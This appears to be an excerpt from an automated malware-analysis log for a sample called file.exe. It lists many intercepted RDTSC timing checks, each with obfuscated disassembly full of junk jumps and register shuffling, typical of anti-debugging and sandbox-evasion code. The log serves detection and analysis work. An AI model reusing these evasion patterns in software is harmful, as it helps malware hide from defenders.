                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1013C second address: 4A10140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10140 second address: 4A1015D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79111F4F09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1015D second address: 4A101D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79113F07A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [eax+10h] 0x0000000c pushad 0x0000000d mov ecx, 6DA607B3h 0x00000012 mov si, 6C0Fh 0x00000016 popad 0x00000017 xchg eax, esi 0x00000018 pushad 0x00000019 mov si, CE07h 0x0000001d mov bh, ch 0x0000001f popad 0x00000020 push eax 0x00000021 jmp 00007F79113F07A6h 0x00000026 xchg eax, esi 0x00000027 jmp 00007F79113F07A0h 0x0000002c mov esi, dword ptr [74E806ECh] 0x00000032 jmp 00007F79113F07A0h 0x00000037 test esi, esi 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F79113F079Ah 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A101D7 second address: 4A101DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A101DD second address: 4A10230 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79113F079Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F79113F159Ah 0x0000000f jmp 00007F79113F07A0h 0x00000014 xchg eax, edi 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F79113F079Dh 0x0000001e sub cx, E1C6h 0x00000023 jmp 00007F79113F07A1h 0x00000028 popfd 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10230 second address: 4A10235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10235 second address: 4A102A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79113F07A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c jmp 00007F79113F07A2h 0x00000011 pop esi 0x00000012 mov dh, C4h 0x00000014 popad 0x00000015 xchg eax, edi 0x00000016 jmp 00007F79113F079Ah 0x0000001b call dword ptr [74E50B60h] 0x00000021 mov eax, 750BE5E0h 0x00000026 ret 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007F79113F079Dh 0x00000030 and ah, FFFFFFE6h 0x00000033 jmp 00007F79113F07A1h 0x00000038 popfd 0x00000039 mov edi, eax 0x0000003b popad 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A102A3 second address: 4A10306 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79111F4EFDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 00000044h 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F79111F4F03h 0x00000012 and ah, FFFFFFCEh 0x00000015 jmp 00007F79111F4F09h 0x0000001a popfd 0x0000001b popad 0x0000001c pop edi 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F79111F4F08h 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10306 second address: 4A1030A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1030A second address: 4A10310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10310 second address: 4A103A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 1F1BB253h 0x00000008 mov bx, si 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, edi 0x0000000f pushad 0x00000010 push esi 0x00000011 mov edx, 621FAFF2h 0x00000016 pop edx 0x00000017 mov ax, 939Fh 0x0000001b popad 0x0000001c push eax 0x0000001d pushad 0x0000001e mov bx, D216h 0x00000022 call 00007F79113F07A7h 0x00000027 mov ax, 4D7Fh 0x0000002b pop ecx 0x0000002c popad 0x0000002d xchg eax, edi 0x0000002e jmp 00007F79113F079Bh 0x00000033 push dword ptr [eax] 0x00000035 jmp 00007F79113F07A6h 0x0000003a mov eax, dword ptr fs:[00000030h] 0x00000040 jmp 00007F79113F07A0h 0x00000045 push dword ptr [eax+18h] 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007F79113F07A7h 0x0000004f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1042A second address: 4A10488 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79111F4F09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F79815E4157h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F79111F4F03h 0x00000018 or eax, 7FCDB8EEh 0x0000001e jmp 00007F79111F4F09h 0x00000023 popfd 0x00000024 mov bx, ax 0x00000027 popad 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10488 second address: 4A104B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79113F079Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub eax, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F79113F07A9h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A104B8 second address: 4A104BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A104BE second address: 4A104D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F79113F07A3h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A104D5 second address: 4A104F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi], edi 0x0000000a pushad 0x0000000b mov ebx, 7E4513E6h 0x00000010 popad 0x00000011 mov dword ptr [esi+04h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 movzx eax, bx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A104F1 second address: 4A104F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A104F6 second address: 4A10513 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F79111F4F09h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10513 second address: 4A105FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79113F07A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+08h], eax 0x0000000e pushad 0x0000000f push eax 0x00000010 jmp 00007F79113F07A3h 0x00000015 pop eax 0x00000016 movsx edi, cx 0x00000019 popad 0x0000001a mov dword ptr [esi+0Ch], eax 0x0000001d jmp 00007F79113F07A0h 0x00000022 mov eax, dword ptr [ebx+4Ch] 0x00000025 jmp 00007F79113F07A0h 0x0000002a mov dword ptr [esi+10h], eax 0x0000002d pushad 0x0000002e mov dh, ah 0x00000030 pushfd 0x00000031 jmp 00007F79113F07A3h 0x00000036 xor cl, FFFFFFEEh 0x00000039 jmp 00007F79113F07A9h 0x0000003e popfd 0x0000003f popad 0x00000040 mov eax, dword ptr [ebx+50h] 0x00000043 jmp 00007F79113F079Eh 0x00000048 mov dword ptr [esi+14h], eax 0x0000004b pushad 0x0000004c mov edi, 0CD5A780h 0x00000051 popad 0x00000052 mov eax, dword ptr [ebx+54h] 0x00000055 pushad 0x00000056 mov dl, E6h 0x00000058 mov di, ax 0x0000005b popad 0x0000005c mov dword ptr [esi+18h], eax 0x0000005f pushad 0x00000060 mov ebx, eax 0x00000062 jmp 00007F79113F07A2h 0x00000067 popad 0x00000068 mov eax, dword ptr [ebx+58h] 0x0000006b jmp 00007F79113F07A0h 0x00000070 mov dword ptr [esi+1Ch], eax 0x00000073 pushad 0x00000074 push eax 0x00000075 push edx 0x00000076 mov ebx, ecx 0x00000078 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A105FE second address: 4A10649 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79111F4F08h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov bx, si 0x0000000c popad 0x0000000d mov eax, dword ptr [ebx+5Ch] 0x00000010 jmp 00007F79111F4EFCh 0x00000015 mov dword ptr [esi+20h], eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F79111F4F07h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10649 second address: 4A10666 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 jmp 00007F79113F079Bh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [ebx+60h] 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10666 second address: 4A10681 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79111F4F07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10681 second address: 4A106A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79113F07A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+24h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A106A7 second address: 4A106AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A106AB second address: 4A106AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A106AF second address: 4A106B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A106B5 second address: 4A106BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A106BA second address: 4A106EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F79111F4EFEh 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [ebx+64h] 0x00000010 jmp 00007F79111F4F01h 0x00000015 mov dword ptr [esi+28h], eax 0x00000018 pushad 0x00000019 pushad 0x0000001a mov cx, 38B9h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A106EF second address: 4A1070A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 call 00007F79113F07A4h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1070A second address: 4A107DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov eax, dword ptr [ebx+68h] 0x00000009 jmp 00007F79111F4F07h 0x0000000e mov dword ptr [esi+2Ch], eax 0x00000011 jmp 00007F79111F4F06h 0x00000016 mov ax, word ptr [ebx+6Ch] 0x0000001a pushad 0x0000001b mov dx, si 0x0000001e mov ch, 3Fh 0x00000020 popad 0x00000021 mov word ptr [esi+30h], ax 0x00000025 jmp 00007F79111F4F05h 0x0000002a mov ax, word ptr [ebx+00000088h] 0x00000031 jmp 00007F79111F4EFEh 0x00000036 mov word ptr [esi+32h], ax 0x0000003a pushad 0x0000003b pushfd 0x0000003c jmp 00007F79111F4EFEh 0x00000041 sbb esi, 2C064318h 0x00000047 jmp 00007F79111F4EFBh 0x0000004c popfd 0x0000004d pushfd 0x0000004e jmp 00007F79111F4F08h 0x00000053 jmp 00007F79111F4F05h 0x00000058 popfd 0x00000059 popad 0x0000005a mov eax, dword ptr [ebx+0000008Ch] 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 pushad 0x00000065 popad 0x00000066 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A107DE second address: 4A107E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A107E2 second address: 4A107E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A107E8 second address: 4A10832 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79113F07A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+34h], eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F79113F079Eh 0x00000013 or ecx, 6BBD1238h 0x00000019 jmp 00007F79113F079Bh 0x0000001e popfd 0x0000001f mov ecx, 0AC7D06Fh 0x00000024 popad 0x00000025 mov eax, dword ptr [ebx+18h] 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10832 second address: 4A10836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10836 second address: 4A1083A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1083A second address: 4A10840 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A109A2 second address: 4A109E9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 call 00007F79113F07A5h 0x0000000b jmp 00007F79113F07A0h 0x00000010 pop eax 0x00000011 popad 0x00000012 lea eax, dword ptr [ebp-10h] 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F79113F07A3h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A109E9 second address: 4A109EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A109EF second address: 4A109F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A109F5 second address: 4A109F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A109F9 second address: 4A109FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A109FD second address: 4A10A47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jmp 00007F79111F4EFAh 0x0000000e push eax 0x0000000f jmp 00007F79111F4EFBh 0x00000014 nop 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 movsx edi, si 0x0000001b pushfd 0x0000001c jmp 00007F79111F4EFCh 0x00000021 jmp 00007F79111F4F05h 0x00000026 popfd 0x00000027 popad 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10A47 second address: 4A10A4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10A60 second address: 4A10A74 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov edx, 5B3E0FEEh 0x0000000b popad 0x0000000c mov edi, eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10A74 second address: 4A10A7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10A7A second address: 4A10A9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a test edi, edi 0x0000000c pushad 0x0000000d push ebx 0x0000000e movzx ecx, bx 0x00000011 pop ebx 0x00000012 pushad 0x00000013 push eax 0x00000014 pop ebx 0x00000015 movzx esi, bx 0x00000018 popad 0x00000019 popad 0x0000001a js 00007F79815E3B25h 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10A9F second address: 4A10AC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F79113F079Eh 0x0000000a sub al, FFFFFFC8h 0x0000000d jmp 00007F79113F079Bh 0x00000012 popfd 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10AC2 second address: 4A10ADA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F79111F4F04h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10ADA second address: 4A10ADE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10ADE second address: 4A10B6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebp-0Ch] 0x0000000b pushad 0x0000000c pushad 0x0000000d mov edx, 666350BEh 0x00000012 jmp 00007F79111F4EFFh 0x00000017 popad 0x00000018 jmp 00007F79111F4F08h 0x0000001d popad 0x0000001e mov dword ptr [esi+04h], eax 0x00000021 jmp 00007F79111F4F00h 0x00000026 lea eax, dword ptr [ebx+78h] 0x00000029 pushad 0x0000002a mov ax, 763Dh 0x0000002e mov dh, cl 0x00000030 popad 0x00000031 push 00000001h 0x00000033 jmp 00007F79111F4F05h 0x00000038 nop 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F79111F4F08h 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10B6B second address: 4A10B71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10B71 second address: 4A10B94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79111F4EFEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F79111F4EFEh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10B94 second address: 4A10B9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A10B9A second address: 4A10BB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F79111F4F04h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A10C6A second address: 4A10C8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop ecx 0x00000005 call 00007F79113F079Bh 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e js 00007F79817DF1D1h 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A10C8A second address: 4A10C8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A10C8E second address: 4A10C94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A10C94 second address: 4A10C9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A10C9A second address: 4A10C9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A10C9E second address: 4A10CCE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79111F4F05h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e pushad 0x0000000f mov dx, cx 0x00000012 mov ah, 1Ah 0x00000014 popad 0x00000015 mov dword ptr [esi+08h], eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov cx, AA23h 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A10CCE second address: 4A10D12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, 5Eh 0x00000005 mov dx, C902h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c lea eax, dword ptr [ebx+70h] 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F79113F079Fh 0x00000016 adc ecx, 0FD44BFEh 0x0000001c jmp 00007F79113F07A9h 0x00000021 popfd 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A10D12 second address: 4A10D16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A10D16 second address: 4A10D45 instructions: 0x00000000 rdtsc 0x00000002 call 00007F79113F079Ch 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push 00000001h 0x0000000d jmp 00007F79113F07A1h 0x00000012 nop 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A10D45 second address: 4A10D49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A10D49 second address: 4A10D5A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79113F079Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A10D5A second address: 4A10DA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F79111F4EFDh 0x0000000b or eax, 50BC50F6h 0x00000011 jmp 00007F79111F4F01h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a nop 0x0000001b jmp 00007F79111F4EFEh 0x00000020 lea eax, dword ptr [ebp-18h] 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F79111F4EFAh 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A10DA8 second address: 4A10DB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79113F079Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A10DB7 second address: 4A10DCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F79111F4F04h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A10DCF second address: 4A10DE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a call 00007F79113F079Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4A10E06 second address: 4A10E59 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79111F4F02h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, eax 0x0000000b jmp 00007F79111F4F00h 0x00000010 test edi, edi 0x00000012 pushad 0x00000013 movzx eax, bx 0x00000016 call 00007F79111F4F03h 0x0000001b mov edi, esi 0x0000001d pop ecx 0x0000001e popad 0x0000001f js 00007F79815E375Ah 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 push esi 0x00000029 pop ebx 0x0000002a mov edi, eax 0x0000002c popad 0x0000002d rdtsc
